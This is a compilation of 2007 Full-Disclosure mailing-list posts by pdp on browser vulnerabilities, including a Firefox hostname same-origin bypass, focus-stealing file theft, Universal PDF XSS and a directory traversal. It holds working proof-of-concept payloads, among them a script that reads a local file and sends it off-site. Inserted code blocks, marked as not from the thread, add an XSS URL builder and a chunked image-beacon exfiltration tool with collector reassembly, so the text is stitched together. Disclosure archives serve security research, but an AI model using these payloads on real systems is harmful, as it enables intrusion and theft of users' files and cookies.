Solution: No solution

Screenshot: http://www.xdisclose.com/images/xdiscloselocalie.jpg

Proof Of Concept: http://www.xdisclose.com/poc/xdiscloselocalie.html

Impact: A remote user can get access to the victim's local system files. Scope of impact is limited to system level.

Original Advisory: http://www.xdisclose.com/XD100099.txt

Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability

Disclaimer: This entire document is strictly for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code is to be used in your testing environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Firefox3 offline support speculations
http://www.gnucitizen.org/blog/firefox-offline

This post is probably totally useless and most likely a waste of your time and mine, but it brings up some points that you may find intriguing.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
very good work

I wonder whether we can execute code on about:config or about:cache. Right now we can only modify cookies and bypass the same origin policy. If we can get JavaScript running on about:cache or about:config or some chrome URL, we might be able to completely hijack the browser. If that is possible, the severity level of this issue is more than HIGH.

On 2/14/07, Michal Zalewski [EMAIL PROTECTED] wrote:
> There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1, but quite certainly affecting all recent versions.
>
> The problem lies in how Firefox handles writes to the 'location.hostname' DOM property. It is possible for a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00.
>
> Doing this prompts a peculiar behavior: internally, DOM string variables are not NUL-terminated, and as such, most checks will consider 'evil.com\x00foo.example.com' to be a part of the *.example.com domain. The DNS resolver, however, and much of the remaining browser code, operates on ASCIZ strings native to C/C++ instead, treating the aforementioned example as 'evil.com'.
>
> This makes it possible for evil.com to modify location.hostname as described above, and have the resulting HTTP request still sent to evil.com. Once the new page is loaded, the attacker will be able to set cookies for *.example.com; he'll also be able to alter document.domain accordingly, in order to bypass the same-origin policy for XMLHttpRequest and cross-frame / cross-window data access.
>
> A quick demonstration is available here: http://lcamtuf.dione.cc/ffhostname.html
>
> If you want to confirm a successful exploitation, check Tools - Options - Privacy - Show Cookies... for coredump.cx after the test; for the demo to succeed, the browser needs to have Javascript enabled, and must accept session cookies.
>
> The impact is quite severe: malicious sites can manipulate authentication cookies for third-party webpages, and, by virtue of bypassing the same-origin policy, can possibly tamper with the way these sites are displayed or how they work.
>
> Regards,
> /mz
> http://lcamtuf.coredump.cx/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
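The root cause Michal describes is two string representations disagreeing about where a hostname ends. The following is an added example, not code from the thread or from Firefox: it models a length-counted (DOM-style) view and a NUL-terminated (ASCIZ) view of the same hostname as two plain functions, runs a typical "is this inside *.example.com?" suffix check against both, and shows a hardened check that refuses the value outright. The hostnames are the ones from the post; nothing here touches a real browser.

```javascript
// Added example (not from the original thread): simulate the DOM-string vs
// ASCIZ mismatch behind the location.hostname cookie/same-origin bypass.

// What a length-counted (DOM-style) check sees: the whole string.
function domView(hostname) {
  return hostname;
}

// What a NUL-terminated (C/C++) consumer such as the resolver sees:
// everything up to the first \x00.
function ascizView(hostname) {
  const nul = hostname.indexOf('\u0000');
  return nul === -1 ? hostname : hostname.slice(0, nul);
}

// A typical "is hostname inside *.parent?" test, as cookie and
// document.domain checks would compute it.
function isSubdomainOf(hostname, parent) {
  const h = hostname.toLowerCase();
  const p = parent.toLowerCase();
  return h === p || h.endsWith('.' + p);
}

// Evaluate both views for one candidate hostname. A disagreement between
// domSaysInside and wireSaysInside is exactly the confusion the post
// describes: checks pass for *.example.com, traffic goes to evil.com.
function analyse(hostname, parent) {
  const domSaysInside = isSubdomainOf(domView(hostname), parent);
  const resolvedHost = ascizView(hostname);
  const wireSaysInside = isSubdomainOf(resolvedHost, parent);
  return {
    domSaysInside,     // what cookie / document.domain checks believe
    resolvedHost,      // where the HTTP request actually goes
    wireSaysInside,
    inconsistent: domSaysInside !== wireSaysInside,
  };
}

// Hardened check: reject anything that is not a plain DNS name before
// comparing suffixes, so a value a C string would truncate never passes.
function isSubdomainOfStrict(hostname, parent) {
  if (!/^[a-z0-9.-]+$/i.test(hostname)) return false;  // rejects \x00 and friends
  return isSubdomainOf(hostname, parent);
}
```

`analyse('evil.com\u0000foo.example.com', 'example.com')` reports `domSaysInside: true`, `resolvedHost: 'evil.com'` and `inconsistent: true`; the strict variant returns `false` for the same input and `true` for an honest `foo.example.com`.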
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
the first one runs in about:blank which is restricted. The second one is very interesting but still not very useful because it acts like about:blank.

hmmm, it seems that the hostname field has been seriously overlooked.

On 2/15/07, Michal Zalewski [EMAIL PROTECTED] wrote:
> On Thu, 15 Feb 2007, pdp (architect) wrote:
>> I wonder whether we can execute code on about:config or about:cache.
>
> Actually, there are several odd problems related to location updates and location.hostname specifically, including one scenario that apparently makes the script run with document.location in the about: namespace. I did not research them any further, so I can't say if they're exploitable - but you can see a demo here, feel free to poke around:
>
> http://lcamtuf.coredump.cx/fftests.html
>
> Cheers,
> /mz
> http://lcamtuf.coredump.cx/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
weird, firefox slowly dies out

t2.html

<html>
<body>
<iframe src="t1.html"></iframe>
</body>
</html>

t1.html

<html>
<body>
<script>location.hostname = "blog.com";</script>
</body>
</html>

On 2/15/07, pdp (architect) [EMAIL PROTECTED] wrote:
> the first one runs in about:blank which is restricted. The second one is very interesting but still not very useful because it acts like about:blank.
>
> hmmm, it seems that the hostname field has been seriously overlooked.
>
> On 2/15/07, Michal Zalewski [EMAIL PROTECTED] wrote:
>> On Thu, 15 Feb 2007, pdp (architect) wrote:
>>> I wonder whether we can execute code on about:config or about:cache.
>>
>> Actually, there are several odd problems related to location updates and location.hostname specifically, including one scenario that apparently makes the script run with document.location in the about: namespace. I did not research them any further, so I can't say if they're exploitable - but you can see a demo here, feel free to poke around:
>>
>> http://lcamtuf.coredump.cx/fftests.html
>>
>> Cheers,
>> /mz
>> http://lcamtuf.coredump.cx/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
explanation of how the attack works here: http://www.gnucitizen.org/blog/browser-focus-rip

On 2/12/07, Michal Zalewski [EMAIL PROTECTED] wrote:
> On Mon, 12 Feb 2007, Claus Färber wrote:
>> A proper solution would be to keep a list of files explicitly selected by the user and only allow uploads of files in this list. Then even if a script can manipulate the field, the browser won't upload files that have not been selected by the user.
>
> Not necessarily that easy: notice that it is the user who enters the name of a target file. Unless you want to prevent the browser from accepting any files that were not chosen using a visual file selector widget - but in such a case, there's not much point in having a manual file path entry box in the first place.
>
> /mz

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
what's up Michal,

IE is vulnerable too, since I used to play around with this bug a long time ago. It is a variation of your exploit but the principles are the same. I don't remember where I've read about it... hmm, I guess securityfocus.com... very nice demo.

On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote:
> There is an interesting logic flaw in the Mozilla Firefox web browser. The vulnerability allows the attacker to silently redirect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how onKeyDown / onKeyPress events are handled, allowing the focus to be moved between the two. If exploited, this enables the attacker to read arbitrary files on the victim's system.
>
> This was tested with 2.0.0.1. Opera is most likely not vulnerable; Microsoft Internet Explorer is not vulnerable as-is, but might be vulnerable to a variant of the attack.
>
> All INPUT TYPE=FILE form fields enjoy the benefits of added protection to prevent scripts from arbitrarily choosing local files to be uploaded to the server, and automatically submitting the form. For example, the .value parameter cannot be set or changed, and any changes to .type reset the contents of the field.
>
> Unfortunately, Firefox allows a malicious script to redirect carefully selected, individual user keystrokes to a hidden file upload field, in order to compose a particular filename, then submit the form. User interaction is required, limiting the impact somewhat - but any website where the user can be reasonably expected to enter some text (a keyboard-controlled web game, a blog posting or commenting interface) can attempt to exploit the vulnerability, and eventually succeed with one user or another.
>
> A quick and naive demonstration of the problem (Firefox on Windows is required; depends on scancode values, so not all keyboards may be supported):
>
> http://lcamtuf.coredump.cx/focusbug/
>
> (Ta-dah again)
> /mz

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
try this

<input id="foo" type="text"/>
<script>
setInterval(function () {
  document.getElementById('foo').focus();
}, 1);
</script>

:) the address bar is disabled...

On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote:
> phh :), I found something very interesting when testing your IE example... every time I try to type something in the address bar, the focus is redirected back to the input box. I wonder if it is possible to capture what the user is typing in the address bar. That would be neat... I am just checking your code to see what the hell is going on.
>
> On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote:
>> On Sun, 11 Feb 2007, pdp (architect) wrote:
>>> IE is vulnerable too, since I used to play around with this bug a long time ago.
>>
>> Possibly MS00-093, but that's long fixed. But yes, an MSIE variant is possible, though more contrived.
>>
>> /mz

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
here is an idea... we can combine both techniques into a single attack... the hardest part of your hack is to force the user to type :// plus several other /, but if we steal the focus from the address bar, unaware users will type something like http://www.google.com for example, which is what we want.

On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote:
> try this
>
> <input id="foo" type="text"/>
> <script>
> setInterval(function () {
>   document.getElementById('foo').focus();
> }, 1);
> </script>
>
> :) the address bar is disabled...
>
> On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote:
>> phh :), I found something very interesting when testing your IE example... every time I try to type something in the address bar, the focus is redirected back to the input box. I wonder if it is possible to capture what the user is typing in the address bar. That would be neat... I am just checking your code to see what the hell is going on.
>>
>> On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote:
>>> On Sun, 11 Feb 2007, pdp (architect) wrote:
>>>> IE is vulnerable too, since I used to play around with this bug a long time ago.
>>>
>>> Possibly MS00-093, but that's long fixed. But yes, an MSIE variant is possible, though more contrived.
>>>
>>> /mz

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
Well, :) I cannot see how you can force someone to type / at least twice. Even if the targeted user writes a blog entry it is very unlikely that he/she will use /. I guess this vector works well on wikis and other systems that allow you to specify the text format through meta-characters.

The cool thing about stealing the address bar focus is that a confused user will try to repeat typing the URL again and that may give you enough slashes and other characters to steal /etc/shadow or /etc/passwd for example, which means that this attack vector can work virtually everywhere.

For example: Joe visits evil.com. He is not interested in the site but evil.com is interested in his files. Joe types http://[whatever]. evil.com hijacks the address bar focus. This is how they get the first /. Joe will probably repeat typing stuff in the address bar again. The rest of the characters are not obtained. Now of course Joe will realise that he is not typing in the address bar but he will probably think that either the browser is screwed up or that he forgot to select the address bar first (it happens all the time). So, this is why I think that a combination of both issues can create one hell of a good attack.

Here is another idea. Joe visits Betty's MySpace private page. The page contains XSS. On the page there is an input box and a captcha. The user is asked to enter the text in the captcha in order to access the page. The captcha is: pde/t/aswsc. Joe enters the text but then he receives a complaint that his input is incorrect. The attacker repeats the process until all required characters are entered into the FILE INPUT box. Simple.

On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote:
> On Sun, 11 Feb 2007, pdp (architect) wrote:
>> here is an idea... we can combine both techniques into a single attack... the hardest part of your hack is to force the user to type :// plus several other /
>
> Actually, MSIE doesn't require drive specification in the filename, and will probably accept relative paths as well (so you might not need \ either when picking files from the desktop or 'my documents' or whatnot). Firefox won't settle for a path without drive specification (but it will accept SMB requests ;-). On *nix systems, of course, aiming at /etc/passwd is easier than C:\whatever.
>
> The problem with intercepting address bar input is that you can't echo the entered text back there without unloading the current document and its scripts; in my examples, I tried to make sure that it's hard for the user to notice that his input is not going where it should (in the MSIE example, this includes simulation of a blinking cursor).
>
> /mz

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
this is a design problem that is not easy to fix.

On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote:
> On Sun, 11 Feb 2007, Michal Zalewski wrote:
>> http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html
>
> Oh, and Secunia doesn't credit the Firefox variant to Charles, either:
>
> NOTE: A variant of this vulnerability was reported in a Mozilla Bugzilla bug entry back in year 2000.
>
> Holy crud!
>
> /mz

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
hey man, this is not news :)

On 2/9/07, Stefano Di Paola [EMAIL PROTECTED] wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl 127.0.0.1:6670/../../../../ -kivvv
> * About to connect() to 127.0.0.1 port 6670
> *   Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
> > GET /../../../../ HTTP/1.1
> > User-Agent: HackTheHacker(tm)
> > Host: 127.0.0.1:6670
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> HTTP/1.1 200 OK
> < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> < Content-Type: text/html
> Content-Type: text/html
> < pow_server: POW/0.0.7
> pow_server: POW/0.0.7
> < Content-Location: /../../../../
> Content-Location: /../../../../
> < Content-Length: 280
> Content-Length: 280
>
> <br><br><br><br>
> <a href='/../../../../firefox/'>firefox/</a><br>
> <a href='/../../../../bookmarks.html'>bookmarks.html</a><br>
> <a href='/../../../../appreg'>appreg</a><br>
> <a href='/../../../../default/'>default/</a><br>
> <a href='/../../../../pluginreg.dat'>pluginreg.dat</a><br>
> * Connection #0 to host 127.0.0.1 left intact
> * Closing connection #0
>
> A new motto is on the way: HackTheHacker (ascii (tm)) :)
>
> Cheers,
> Stefano
>
> On Fri, 09/02/2007 at 16.23 +, pdp (architect) wrote:
>> http://www.gnucitizen.org/blog/plain-old-webserver
>>
>> Must have Firefox Extension that allows you to do all sorts of crazy stuff.
>>
>> https://addons.mozilla.org/firefox/3002/
>
> --
> ...oOOo...oOOo
> Stefano Di Paola
> Software Security Engineer
> Web: www.wisec.it

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] The Machine is Us/ing Us
http://www.gnucitizen.org/blog/the-machine-is-using-us

Interesting video that shows some of the reasons why the web has become so dangerous

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Plain Old Webserver - The coolest firefox extension
http://www.gnucitizen.org/blog/plain-old-webserver

Must have Firefox Extension that allows you to do all sorts of crazy stuff.

https://addons.mozilla.org/firefox/3002/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Useful technique when performing XSS
http://www.gnucitizen.org/blog/playing-in-large

Basically this article is about how to squeeze more data into a size restricted, unsanitized field. This technique can also be used to hide attackers' activities.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Amit, :)

This is not about who did it first.

BTW, your example is broken. location.search does not include the fragment identifier.

Cheers

On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
> pdp (architect) wrote:
>> http://www.gnucitizen.org/blog/playing-in-large
>>
>> Basically this article is about how to squeeze more data into a size restricted, unsanitized field. This technique can also be used to hide attackers' activities.
>
> It seems that you've stumbled upon something I already disclosed:
> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
>
> Sorry...
> -Amit

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Hei Amit,

On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
> pdp (architect) wrote:
>> Amit, :)
>>
>> This is not about who did it first.
>
> Agreed. But it would be nice to receive the credit ;-)

Sorry man. Had I known that you had discussed this before, I would definitely have given you the credit. :)

>> BTW, your example is broken. location.search does not include the fragment identifier.
>
> Guilty as charged. I remember working directly with document.location (which includes the hostname and path) when I investigated the issue, then when I wrote my text I decided that a more elegant way would be with the .search property, but I failed to verify that it actually works.
>
> Thanks for pointing this out, and here's the formal errata:
>
> In http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, the example should be:
>
> http://target.site/vulnscript.cgi?injectme=<script>eval(document.location.substr(...[fill in the offset here]...))</script>#...JS payload here...
>
> Thanks to pdp (architect) for pointing this out.
>
> Regards,
> -Amit
>
>> Cheers
>>
>> On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
>>> pdp (architect) wrote:
>>>> http://www.gnucitizen.org/blog/playing-in-large
>>>>
>>>> Basically this article is about how to squeeze more data into a size restricted, unsanitized field. This technique can also be used to hide attackers' activities.
>>>
>>> It seems that you've stumbled upon something I already disclosed:
>>> http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
>>>
>>> Sorry...
>>> -Amit

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
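Both the "playing in large" post announced above and Amit's errata rest on the same property of URLs: the browser keeps the fragment to itself, so a short reflected stub can pull an arbitrarily long payload out of `document.location` while the server (and the length limit on the injected field) only ever sees the part before `#`. The following is an added example, not code from either author: it builds Amit's corrected form with the offset computed instead of filled in by hand, and shows why the original `.search` form could not work. `target.site`, `vulnscript.cgi` and `injectme` are the placeholders from the thread; it runs under Node's WHATWG `URL` class.

```javascript
// Added example (not from the thread): a payload carried in the URL
// fragment, read back by offset the way Amit's corrected stub does.

// What the server, its logs and any length check on the vulnerable
// parameter receive: the fragment is never sent on the wire.
function asSentToServer(href) {
  const u = new URL(href);
  return u.origin + u.pathname + u.search;
}

// What the page can read client-side from document.location.
function fragmentPayload(href) {
  const h = new URL(href).hash;
  return h.startsWith('#') ? h.slice(1) : '';
}

// Amit's corrected form: eval(document.location.substr(N)), N being the
// index just past the first '#'. The stub's text contains N and N depends
// on the stub's length, so search for the fixed point instead of guessing.
function buildInjectionUrl(base, param, payload) {
  for (let n = 1; n < 4096; n++) {
    const stub = `<script>eval(document.location.substr(${n}))</script>`;
    const prefix = `${base}?${param}=${encodeURIComponent(stub)}#`;
    if (prefix.length === n) return prefix + payload;
  }
  throw new Error('no fixed point for offset');
}

// Simulate the reflected stub running in the page: pull N out of the
// query string and take everything from that offset on.
function payloadViaOffset(href) {
  const m = /substr\((\d+)\)/.exec(decodeURIComponent(new URL(href).search));
  return m ? href.substr(Number(m[1])) : null;
}

// The form from the 2005 post: location.search stops before '#', so
// nothing of the payload is ever visible here.
function payloadViaSearch(href) {
  const s = new URL(href).search;
  return s.indexOf('#') === -1 ? '' : s.slice(s.indexOf('#') + 1);
}
```

For `buildInjectionUrl('http://target.site/vulnscript.cgi', 'injectme', 'alert(document.cookie)')`, `asSentToServer` contains neither `#` nor the payload, `payloadViaOffset` and `fragmentPayload` both return `alert(document.cookie)`, and `payloadViaSearch` returns the empty string. The stub's length is fixed regardless of how long the payload grows, which is the whole point of the technique.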
[Full-disclosure] Technika - Attack Scripting Environment
http://www.gnucitizen.org/projects/technika/

Technika was developed for computer security professionals to automate common exploitative tasks from the browser. It acts like a standard OS shell scripting environment. You can script everything from the currently viewed page and also spawn processes, unrestricted XMLHttpRequest connections and Sockets.

Technika was successfully used to implement several Web and System related exploits that run directly from the browser. Unfortunately their source code cannot be shown here for obvious reasons.

The extension is still in Alpha although it is mostly usable and quite stable. If you have a proposal, question, suggestion or correction, please contact us.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] What happens to Your Computer if you Mispell Google.com
http://www.gnucitizen.org/blog/what-happens-to-your-computer-if-you-mispell-googlecom

it is worth seeing this

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Atom Database
The purpose of this database is to collect and discuss useful attack snippets (atoms) which can be employed when performing WEB Application Security testing.

http://www.gnucitizen.org/topics/atom-database

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Persistent Web Backdoor
It is simple, it is lame, yet very interesting. This kind of stuff raises a lot of questions.

http://www.gnucitizen.org/projects/greasecarnaval

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] Universal PDF XSS After Party
Everybody knows about it. Everybody talks about it. We had a nice party. It is time for estimating the damages. In this article I will try to show the impact of the Universal PDF XSS vulnerability by explaining how it can be used in real life situations.

http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
I just skimmed through your code very quickly and I noticed a single problem. Don't send the captured data with another XHR (xhr2). Use images.

var img = new Image();
img.src = url;

This should work.

On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:
> I'm trying to put together a demonstration of this vulnerability, and how it could affect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver: the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability.
>
> Here's the code I have so far, based more or less on PDP's. Vanilla, almost PDP's (different url, spaces removed etc.):
>
> file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);
>
> What I'm trying to do:
>
> file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechange = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);
>
> Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6). I think because by default IE disallows Javascript access on the local context.
>
> Try putting this in IE:
>
> file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol');
>
> and then try it in FireFox. It won't work in IE 6, but it executes just fine in FireFox.
>
>     function cXHR(){ // Grabs a legit XHR.
>       try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){}
>       try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){}
>       try{ return new XMLHttpRequest(); }catch(e){}
>       return null;
>     }
>     var xhr = cXHR();  // For grabbing
>     var xhr2 = cXHR(); // For sending
>     xhr.onreadystatechange = function(){
>       if (xhr.readyState == 4){
>         alert(xhr.responseText);
>         xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText); // Send it up, yo.
>         xhr2.onreadystatechange = function(){ // property name corrected from "onreadystatechage" in the posted code
>           alert('File Transferred!');
>         };
>         xhr2.send(null);
>       }
>     };
>     xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);
>     xhr.send(null);
>
> Anyone's input on this matter would be appreciated.
>
> On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote:
>> Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8.
>>
>> - Juha-Matti
>>
>> Larry Seltzer [EMAIL PROTECTED] wrote:
>>> According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0.
>>>
>>> I've actually tested it. On Reader 8 Acrobat you get a messagebox that says "This operation is not allowed"
>>>
>>> Larry Seltzer
>>> eWEEK.com Security Center Editor
>>> http://security.eweek.com/
>>> http://blog.eweek.com/blogs/larry%5Fseltzer/
>>> Contributing Editor, PC Magazine
>>> [EMAIL PROTECTED]

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
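pdp's answer is the classic substitute for a cross-domain XHR: a GET triggered by an image load is not subject to the same-origin check, but it only carries what fits in a URL. The following is an added example, not code from pdp or T Biehn: it turns arbitrary data into a sequence of numbered image-beacon URLs (base64url-encoded so chunk boundaries never fall inside an escape sequence), fires them through `Image` when one exists, and includes the collector-side reassembly so the round trip can be checked offline. The collector URL `http://collector.example/log`, the session id and the sample data are all constructed for the demonstration.

```javascript
// Added example (not from the thread): leak data with image requests,
// chunked to fit GET URLs, plus the collector-side reassembly.

const COLLECTOR = 'http://collector.example/log';   // assumed endpoint
const MAX_URL = 2000;                                // conservative GET length limit

// base64url: safe in a query string, and chunks can be cut at any index.
function toBase64Url(s) {
  const b64 = (typeof Buffer !== 'undefined')
    ? Buffer.from(s, 'utf8').toString('base64')
    : btoa(unescape(encodeURIComponent(s)));       // browser path
  return b64.replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}

function fromBase64Url(s) {
  const b64 = s.replace(/-/g, '+').replace(/_/g, '/');
  return (typeof Buffer !== 'undefined')
    ? Buffer.from(b64, 'base64').toString('utf8')
    : decodeURIComponent(escape(atob(b64)));       // browser path
}

// One beacon URL per chunk, numbered so the collector can reorder them,
// followed by a terminator that carries the expected chunk count.
function beaconUrls(data, sessionId, maxUrl = MAX_URL) {
  const body = toBase64Url(data);
  const head = `${COLLECTOR}?s=${encodeURIComponent(sessionId)}&n=`;
  const room = maxUrl - head.length - '9999&d='.length;  // leave space for index + separator
  if (room < 1) throw new Error('maxUrl too small for any payload');
  const urls = [];
  for (let i = 0, n = 0; i < body.length; i += room, n++) {
    urls.push(`${head}${n}&d=${body.slice(i, i + room)}`);
  }
  urls.push(`${head}${urls.length}&d=&end=1`);     // n here is the chunk count
  return urls;
}

// Fire the beacons. In a browser each Image() issues a GET with no
// same-origin check; outside a browser this only returns the URLs.
function sendViaImages(data, sessionId, maxUrl = MAX_URL) {
  const urls = beaconUrls(data, sessionId, maxUrl);
  if (typeof Image !== 'undefined') {
    for (const u of urls) { const img = new Image(); img.src = u; }
  }
  return urls;
}

// Collector side: reassemble from whatever beacons arrived, in any order.
// Returns null if the terminator or any chunk is missing.
function reassemble(receivedUrls) {
  const parts = new Map();
  let expected = null;
  for (const u of receivedUrls) {
    const q = new URL(u).searchParams;
    const n = Number(q.get('n'));
    if (q.get('end') === '1') { expected = n; continue; }
    parts.set(n, q.get('d'));
  }
  if (expected === null || parts.size !== expected) return null;
  let body = '';
  for (let i = 0; i < expected; i++) body += parts.get(i);
  return fromBase64Url(body);
}
```

`beaconUrls(data, 'sess1', 120)` keeps every URL at or under 120 characters and `reassemble` recovers the original string even when the beacons arrive reversed; dropping any chunk makes it return `null`, which is why the terminator carries the count. Image beacons are fire-and-forget, so a real collector should also tolerate duplicates, which the `Map` keyed on chunk index already does.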
[Full-disclosure] Universal XSS with PDF files: highly dangerous
I will be very quick and just point to links where you can read about this issue.

It seems that PDF documents can execute JavaScript code for no apparent reason by using the following template:

http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here

You must understand that the attacker doesn't need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that's all there is to it. The rest is just a matter of your abilities and desires.

This finding was originally mentioned by Sven Vetsch, on his blog. This is very good and quite interesting. Good work.

There is a POC I composed:

http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);

More on the matter can be found here:

http://www.gnucitizen.org/blog/danger-danger-danger/
http://www.disenchant.ch/blog/hacking-with-browser-plugins/34

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous
no worries, the vulnerability details presented on my blog post were updated. good work.

On 1/3/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> Quoting pdp (architect) [EMAIL PROTECTED]:
> > This finding was originally mentioned by Sven Vetsch, on his blog. This is very good and quite interesting. Good work.
>
> Sorry about that but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin. The only thing that I did was an overview, and I found out that it doesn't matter how the parameter is called. I just forgot to copy-paste the credits from my original document to the blog entry. I'm very sorry about that and of course I put it in my entry now.
>
> Regards,
> Disenchant / Sven Vetsch

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] Adobe Acrobat Reader Plugin - Multiple Vulnerabilities
> Explorer: http://site.com/file.pdf#...(More '#')
> The application is waiting for more inputs and allocates more memory.
>
> --
> ...oOOo...oOOo
> Stefano Di Paola
> Software Security Engineer
> Web: www.wisec.it
> ..

--
